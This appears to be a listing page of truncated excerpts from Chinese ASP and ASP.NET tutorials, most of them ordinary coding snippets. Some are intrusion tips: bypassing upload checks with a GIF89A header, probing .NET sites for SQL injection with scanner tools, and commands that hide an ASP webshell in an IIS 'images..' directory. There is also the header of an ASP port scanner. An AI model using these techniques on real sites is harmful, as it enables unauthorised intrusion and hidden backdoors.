ASP

z.asp 複製代碼 代碼如下:<% s= Server.MapPath("z.asp") Set fso = CreateObject("Scripting.FileSystemObject") If fso.FileExists(s) Then fso.Deletefile(s) End If Set fso = Nothing %> z.php 複製代碼 代碼如下:<?php $file = "z.php"; if

1、 對一般遇到.net的網站時 通常會註冊個使用者 第一選擇利用上傳判斷的漏洞 加圖標題GIF89A 順利饒過 2、 第二種就是注入了, 在?id=xx後加單引號 " ' " 一般情況下 用NBSI 啊D來SCAN 都可以發現BUG頁面 而且國內大多.net都是使用MSSQL資料庫 發現注入點也可以從login下手 其實這個方法目前的成功率在75% 3、 不過遇到搜尋型的,和沒錯誤資訊回顯的時候 在這裡就卡住了 大家可以看看網上一篇 搜尋型注入的文章 運氣好,資料庫和WEB在一起

此時我們通常能想到的想法是找一個exe程式，把這個問題解決掉。我原來用C#寫過這樣一個類似的程式。 Google裡面應該能找到我以前寫的那個。就不說了。 後來某一天，我發現ASP就能實現。我當時真的覺得自己太屎了。 不過ASP的這種方法很不好。容易造成系統崩潰（如果資料庫大）。 所以只是寫在這裡。算是拋磚引玉。 '下面我解釋一下下： Function TransferJapanDc9CnInDB() On Error Resume Next Err.Clear Dim

今天我就把我用ACCESS參數化查詢的一些方法和經驗和大家分享 希望對大家有所啟發，有寫的不對的地方希望高手們多多指教 ASP.NET 用OleDbCommand的new OleDbParameter建立參數貨查詢 ASP用Command的CreateParameter 方法建立參數化查詢 (SQL儲存過程查詢也是用這個方法建立的) ASP.NET　C#文法 OleDbParameter parm = new OleDbParameter(Name, Type, Direction, Size,

1、Default.aspx代碼如下：複製代碼 代碼如下:<%@ Page Language="C#" AutoEventWireup="true" CodeFile="Default.aspx.cs" Inherits="_Default" ValidateRequest="false" %> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"

在這裡我們主要是使用Gmail，究其原因，是因為，我在使用Gmail的郵箱發送郵件的時候，遇到一小小的困難，而使用163等郵箱的時候，沒遇到這個問題。 在ASP.NET2.0中，發送郵件是很簡單的，我們主要使用來自命名空間System.Net.Mail中的幾個類，MailMessage和SmtpClient。 核心代碼是很簡潔的，如下： 複製代碼 代碼如下: string to = "這裡填寫接收者的Email地址"; string from =

1、建立非標準目錄：mkdir images..\ 拷貝ASP木馬至目錄：copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp 通過web訪問ASP木馬：http://ip/images../news.asp?action=login 如何刪除非標準目錄：rmdir images..\ /s 2、Windows中的IIS會對以.asp結尾的目錄中的檔案進行解析，以達到我們隱藏自己的網頁後門的目的: mkdir

放在conn.asp裡就行了。 '屏蔽通過地址欄攻擊 url=Request.ServerVariables("QUERY_STRING") if instr(url,";")>=1 then url=Replace(url,";","；") : Response.Redirect("?" & url) end if '屏蔽通過表單攻擊 for each item in request.form

這個方法可以把整個檔案夾打包到xml檔案中，把這個xml檔案檔案和解包檔案放在一起後，運行解包檔案就可以把原來的檔案釋放出來，這樣我們就可以把網站打包上傳到虛擬機器主機，再運行解包檔案就可以了。我在本地測試之選擇了少部分檔案，不知在檔案很多的情況執行效率如何。 其實實現的思路也很簡單，主要利用的是xml檔案可以存放位元據的原理。有興趣的朋友可以下載下面的附件研究下！！ 解包檔案複製代碼 代碼如下:<%@LANGUAGE="VBSCRIPT"

簡單的： 複製代碼 代碼如下:public partial class _Default : System.Web.UI.Page { string m1 = ""; protected void Page_Load(object sender, EventArgs e) { string n = "123"; string m = ""; zuhe(n); for (int j = 2;

Application對象內建集合有為存放簡單類型設計的Contents,預設Application("key")就可以使用。 不過Application.Contents不能存放對象,可以存vbs數組,但是在javascript下甚至數組都不能放。 使用Application.Contents時,只能用醜陋的如: for(var i=0;i<15000;i++){ Application.Lock(); //

代碼如下：JScript 複製代碼 代碼如下:function GenerateGuid() { var TypeLib = new ActiveXObject("Scriptlet.TypeLib"); return (TypeLib.Guid); } VBScript 複製代碼 代碼如下:Function GenerateGuid() Dim TypeLib Set TypeLib =

按個測試了一下可能會是哪些屬性引起的效能問題，在去掉Type也就是類型屬性顯示的時候，效能有了很大提高，之後的測試也證明了是Type屬性的使用導致了效能問題。

複製代碼 代碼如下:<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%> <!-- #include file="conn.asp" --> <!-- #include file="inc/function.asp" --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"&

Rem 將字串轉換為整形資料 function toInteger(str,num) str=trim(str) if str="" or not isnumeric(str) then toInteger=num else toInteger=clng(str) end if end function Rem 將字串轉換為雙精確度型資料 function

/// <summary> /// 替換html中的特殊字元 /// </summary> /// <param name="theString">需要進行替換的文本。</param> /// <returns>替換完的文本。</returns> public string HtmlEncode(string theString) { theString=theString.Replace(">",

一、ASP建立對象的技巧 當我們使用伺服器組件建立對象時，一般有兩種方法。比較常用的方法是用SERVER對象的CreateObject() 方法，象這樣: SET NextLink = Server.CreateObject("MSWC.NextLink") 這種方法很好用，但是還有一種方法更節省系統資源。 當你用Server.CreateObject()方法建立對象時，對象立即被載入，同時系統為這個對象分配好記憶體和其它資源。 第二種建立對象的方法是利用HTML的<

/// <summary> /// 快速驗證一個字串是否符合指定的Regex。 /// </summary> /// <param name="_express">Regex的內容。</param> /// <param name="_value">需驗證的字串。</param> /// <returns>是否合法的bool值。</returns> public static bool

/// <summary> /// 擷取querystring /// </summary> /// <param name="s">參數名</param> /// <returns>傳回值</returns> public string q(string s) { if (Request.QueryString[s] != null) { return

自己把以下代碼儲存為ASP檔案。當然我還是一如既往的BS那些只改作者名字的傢伙。 複製代碼 代碼如下:<% '============ ASP Port Scanner by lake2 =================== 'http://lake2.0x54.org 'Version: 0.1 'For SpringBoard '========================================================== %>